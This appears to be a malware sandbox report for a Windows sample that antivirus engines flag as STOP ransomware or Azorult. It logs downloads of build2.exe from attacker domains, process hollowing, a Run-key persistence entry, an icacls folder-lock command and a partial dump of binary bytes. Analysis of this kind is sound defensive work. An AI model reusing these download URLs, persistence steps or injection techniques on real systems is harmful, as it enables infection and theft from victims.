BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0
request GET http://dgos.top/dl/build2.exe
request GET http://astdg.top/nddddhsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
domain astdg.top description Generic top level domain TLD
domain dgos.top description Generic top level domain TLD
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 598016
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f0000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3972
region_size: 1159168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 4888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 598016
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 4888
region_size: 1159168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2120
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 413696
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0064c000
process_handle: 0xffffffff
1 0 0
name GAHELOCESUFEGUC language LANG_SERBIAN filetype ASCII text, with very long lines, with no line terminators sublanguage SUBLANG_DEFAULT offset 0x0025c2a0 size 0x000021af
name NEVOM language LANG_SERBIAN filetype ASCII text, with very long lines, with no line terminators sublanguage SUBLANG_DEFAULT offset 0x0025b9e0 size 0x000008bd
name RT_ICON language LANG_SERBIAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x0025b538 size 0x00000468
name RT_ICON language LANG_SERBIAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x0025b538 size 0x00000468
name RT_ICON language LANG_SERBIAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x0025b538 size 0x00000468
name RT_ICON language LANG_SERBIAN filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_DEFAULT offset 0x0025b538 size 0x00000468
name RT_STRING language LANG_SERBIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x0025e680 size 0x00000240
name RT_ACCELERATOR language LANG_SERBIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x0025e478 size 0x00000010
name RT_ACCELERATOR language LANG_SERBIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x0025e478 size 0x00000010
name RT_GROUP_ICON language LANG_SERBIAN filetype data sublanguage SUBLANG_DEFAULT offset 0x0025b9a0 size 0x0000003e
file C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe
file C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe
file C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Î?ìŠeQ¿ŠeQ¿ŠeQ¿”7Ä¿eQ¿”7Õ¿ÉeQ¿”7Ò¿ eQ¿­£*¿eQ¿ŠeP¿&eQ¿”7Û¿‹eQ¿”7Å¿‹eQ¿”7À¿‹eQ¿RichŠeQ¿PELYˆˆ^à  R > `×p @З6 4= < V€ì&s  @p ˆ.textAQ R  `.rdataRÜp ÞV @@.dataÇP 4 @À.rsrcV XT @@.reloc&L€N¬ @BU‹ìQ‰Mü‹EüÇ8sI‹Mü賋å]ÃÌÌÌÌU‹ìQ‰Mü‹EüÇ8sI‹Müèø²‹Mƒát ‹UüR较ċEü‹å]ÂÌÌÌÌÌÌÌÌÌÌÌU‹ì‹E ]ÃÌÌÌÌÌÌÌÌU‹ì]ÃÌÌÌÌÌÌÌÌÌÌÌU‹ì‹E‹M Šˆ]ÃÌU‹ìƒì‹E‰Eü‹MüƒÁ‰Mø‹UüŠˆE÷ƒEü€}÷uî‹Mü+Mø‰Mð‹Eð‹å]ÃÌÌÌÌÌÌÌÌÌU‹ì‹EP‹MQ‹U R‹EPèh¾ƒÄ‹E]ÃU‹ì‹EP‹MQ‹U R‹EP诃ċE]ÃU‹ìjÿhHXId¡Pd‰%ƒì‰Mà‹EàNjMàÇA‹Uà‹E‹ ;t6jMð艦ÇEü‹MàèJ‹U‹P‹Màè¬ÇEüÿÿÿÿMð蝦‹Eà‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌÌÌÌU‹ìjÿhHXId¡Pd‰%ƒì‰Mà‹Eà‹M‹;t6jMðè ¦ÇEü‹Màè͋E‹Q‹Màè/ÇEüÿÿÿÿMðè ¦‹Eà‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿhHXId¡Pd‰%ƒì ‰Mè‹Eè‹;MtQjMð莥ÇEü‹MèèOƒ}t‹Uƒ:ýt‹Eè‹M‹‰P‹E‹M艋Uè‹E‰ÇEüÿÿÿÿMð臥‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌU‹ìƒì‰Mø‹Eøƒ8td‹Mø‹ƒ:ýtZ‹Eø‹‰Mü‹Uüƒ:t‹Eü‹;Møt ‹Uü‹ƒÀ‰Eüëá‹Müƒ9uh½h¸JhHJèB‘ƒÄ ‹Uü‹Eø‹H‰ ‹UøÇ‹å]ÃÌÌÌÌÌÌÌU‹ìƒì ‰MôjMü蝤‹Eôƒ8ýt3‹Mô‰Møë ‹Uø‹‹Mø‹P‰‹Eøƒ8t ‹Mø‹ÇëދEôǍMü蚤‹å]ÃÌÌÌÌÌÌU‹ìƒì‰MðjMøè=¤‹Eð‹‰Mü‹Uð‹E‹‰ ‹U‹Eü‰‹Mðƒ9ýt#‹Uð‹‰Eôë ‹Mô‹Q‰Uôƒ}ôt ‹Eô‹Mð‰ëç‹Uƒ:ýt#‹E‹‰Môë ‹Uô‹B‰Eôƒ}ôt ‹Mô‹U‰ëçMø褋å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿh YId¡Pd‰%ƒìd‰M‹Mè­ÇEü‹EÇtI‹MƒÁ ‰M”‹U”Ç‹Eƒ8ýu ‹M”ÇýÿÿÿÆEüjj‹M”èw3‹hJRj‹EP‹M”èÂ1ÆEüÇEüÿÿÿÿ‹E‹Môd‰ ‹å]ÂÌÌÌÌU‹ìƒì$‰M܋EÜÇtI‹M܃Á ‰Màjj‹Màè3‹Màè1þÿÿ‹MÜè)®‹å]ÃÌÌÌÌÌU‹ìƒì$‰M܋MÜè¯ÿÿÿ‹Eƒàt ‹MÜQè.¹ƒÄ‹E܋å]ÂÌÌU‹ìƒì`‰M ‹EP‹M èÛþÿÿ‹M ÇtI‹E ‹å]ÂÌÌÌÌÌÌÌÌÌU‹ìƒì$‰M܋EÜÇtI‹MÜèFÿÿÿ‹å]ÃÌÌU‹ìƒì$‰M܋EÜÇtI‹MÜè&ÿÿÿ‹Mƒát ‹UÜR襸ƒÄ‹E܋å]ÂÌÌÌÌÌÌÌÌÌU‹ìƒì$‰M܋EÜÇXJ‹M܃Á ‰Màjj‹Màè2‹Màè1ýÿÿ‹MÜè)­‹å]ÃÌÌÌÌÌU‹ìƒì ‰Mø‹EøƒÀ ‰Eü‹Müƒyr ‹Uü‹B‰Eôë ‹MüƒÁ‰Mô‹Eô‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì$‰M܋MÜèoÿÿÿ‹Eƒàt ‹MÜQèÄ‹E܋å]ÂÌÌU‹ìƒì`‰M¤ÇEü‹E¤ƒxr ‹M¤‹Q‰U ë ‹E¤ƒÀ‰E ‹M Q‹Mè—‹UüƒÊ‰Uü‹E‹å]ÂÌÌÌÌÌU‹ìjÿh„YId¡Pd‰%ƒìd‰Mj‹Mèè ÇEü‹EƒÀ‰EԍMë‰Mì‹UÔÇjj‹MÔèí0ÆEü‹EƒÀ$‰EčMˉM̋UÄÇjj‹MÄèÅ0ÆEü‹EƒÀD‰E´M»‰M¼‹U´Çjj‹M´è0ÆEü‹EƒÀd‰E”M«‰M¬‹U”Çjj‹M”èu0ÆEü‹EP‹MQèĕƒÄÇEüÿÿÿÿ‹E‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌU‹ìjÿh³XId¡Pd‰%ì„‰pÿÿÿÇEü‹…pÿÿÿPèù•ƒÄÆEü‹pÿÿÿƒÁd‰MÔjj‹MÔèê/‹MÔèûÿÿÆEü‹•pÿÿÿƒÂD‰U´jj‹M´èÆ/‹M´èÞúÿÿÆEü‹…pÿÿÿƒÀ$‰E”jj‹M”è¢/‹M”èºúÿÿÆEü‹pÿÿÿƒÁ‰tÿÿÿjj‹tÿÿÿèx/‹tÿÿÿèúÿÿÇEüÿÿÿÿ‹pÿÿÿèkŸ‹Môd‰ ‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿh@YId¡Pd‰%ƒìh‰MŒ‹EP‹MŒè–©ÇEü‹MŒÇXJ‹UƒÂ ‰U‹EŒƒÀ ‰E”‹M”Ç‹Uƒ:ýu ‹E”ÇýÿÿÿÆEüjj‹M”èÊ.‹ hJQj‹UR‹M”è-ÆEüÇEüÿÿÿÿ‹EŒ‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌU‹ìQ‰Mü‹Eü‹M‰‹Eü‹å]ÂÌÌÌÌÌÌÌÌU‹ìƒì‰MøjMüè-ž‹Eøƒxÿs‹Mø‹QƒÂ‹Eø‰PMüèMž‹å]ÃÌÌÌÌÌÌÌÌÌU‹ìƒì ‰MôjMüè흋Eôƒxv‹Môƒyÿs‹Uô‹Bƒè‹Mô‰A‹Uô‹B÷ØÀ÷Ð#Eô‰EøMüèò‹Eø‹å]ÃÌÌÌÌÌÌÌÌÌÌÌU‹ì‹EP‹MQ‹U R‹EPè(ŠƒÄ]ÃÌÌÌU‹ì‹EPèävƒÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ‰Mü‹EüLjsI‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQ‰Mü‹EüLjsI‹Mü‹U‰Q‹Eü‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì ‰Mô‹Eôƒ8t‹Mô‹ èõþÿÿPè_vƒÄ‹å]ÃÌÌÌÌÌÌÌÌU‹ìjÿh[Id¡Pd‰%ƒìt‰M€ÇEЍEÔP‹M€‹ ƒÁèJûÿÿÇEü‹Uǃ}Ôýu ‹EÇýÿÿÿÆEüjj‹Mè«,‹ hJQjUÔR‹Mèö*ÆEü‹EЃÈ‰EÐÆEüjjMÔèy,MÔè‘÷ÿÿ‹E‹Môd‰ ‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‰Mô‹Eô‹‹U;Q s‹Eô‹‹Q‹E‹ ‚‰MðëÇEð‹Uð‰Uüƒ}üu ‹Eô‹
request_handle: 0x00cc0010
1 1 0
section {u'size_of_data': u'0x000a1000', u'virtual_address': u'0x00001000', u'entropy': 7.966481820125816, u'name': u'.text', u'virtual_size': u'0x000a0ef6'} entropy 7.96648182013 description A section with a high entropy has been found
entropy 0.87381275441 description Overall entropy of this PE file is high
url http://www.openssl.org/support/faq.html
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 8212
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 3700
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper reg_value "C:\Users\test22\AppData\Local\0629fab9-c068-4a7f-a7d6-1a28e60429b4\build.exe" --AutoStart
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 8212
process_handle: 0x00000080
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3700
process_handle: 0x00000080
1 1 0
Process injection Process 3972 called NtSetContextThread to modify thread in remote process 8212
Process injection Process 4888 called NtSetContextThread to modify thread in remote process 3700
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 8212
1 0 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 3700
1 0 0
Process injection Process 3972 resumed a thread in remote process 8212
Process injection Process 8212 resumed a thread in remote process 4888
Process injection Process 4888 resumed a thread in remote process 3700
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 8212
1 0 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 4888
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 3700
1 0 0
cmdline icacls "C:\Users\test22\AppData\Local\0629fab9-c068-4a7f-a7d6-1a28e60429b4" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Time & API Arguments Status Return Repeated

__anomaly__

tid: 6420
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
FireEye Generic.mg.f41fd95f121782d8
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (D)
K7GW Trojan ( 0056689f1 )
K7AntiVirus Trojan ( 0056689f1 )
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky UDS:Trojan-Ransom.Win32.Stop.gen
Sophos ML/PE-A
McAfee-GW-Edition BehavesLike.Win32.Lockbit.bc
Microsoft Trojan:Win32/Azorult.BL!MTB
Cynet Malicious (score: 100)
Acronis suspicious
VBA32 Malware-Cryptor.InstallCore.6
Malwarebytes MachineLearning/Anomalous.95%
Rising Trojan.Generic@ML.96 (RDML:SbQtGbO6zptak1TDyz8yMw)
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/GenKryptik.ERHN!tr
AVG Win32:CrypterX-gen [Trj]
Cybereason malicious.7f1bbd
Avast Win32:CrypterX-gen [Trj]
Qihoo-360 HEUR/QVM10.1.599A.Malware.Gen
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 3204
thread_handle: 0x0000007c
process_identifier: 8212
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 8212
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 8212
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 8212
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 8212
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 8212
1 0 0

CreateProcessInternalW

thread_identifier: 5540
thread_handle: 0x000002fc
process_identifier: 4372
current_directory:
filepath:
track: 1
command_line: icacls "C:\Users\test22\AppData\Local\0629fab9-c068-4a7f-a7d6-1a28e60429b4" /deny *S-1-1-0:(OI)(CI)(DE,DC)
filepath_r:
stack_pivoted: 0
creation_flags: 72 (DETACHED_PROCESS|IDLE_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x000002ec
1 1 0

CreateProcessInternalW

thread_identifier: 6676
thread_handle: 0x00000288
process_identifier: 4888
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000290
1 1 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 4888
1 0 0

CreateProcessInternalW

thread_identifier: 8548
thread_handle: 0x0000007c
process_identifier: 3700
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 3700
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 3700
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3700
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 3700
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 3700
1 0 0

CreateProcessInternalW

thread_identifier: 6420
thread_handle: 0x000002a0
process_identifier: 2120
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe"
filepath_r: C:\Users\test22\AppData\Local\d4619d00-241d-4776-a151-bd1052ec2f43\build2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000298
1 1 0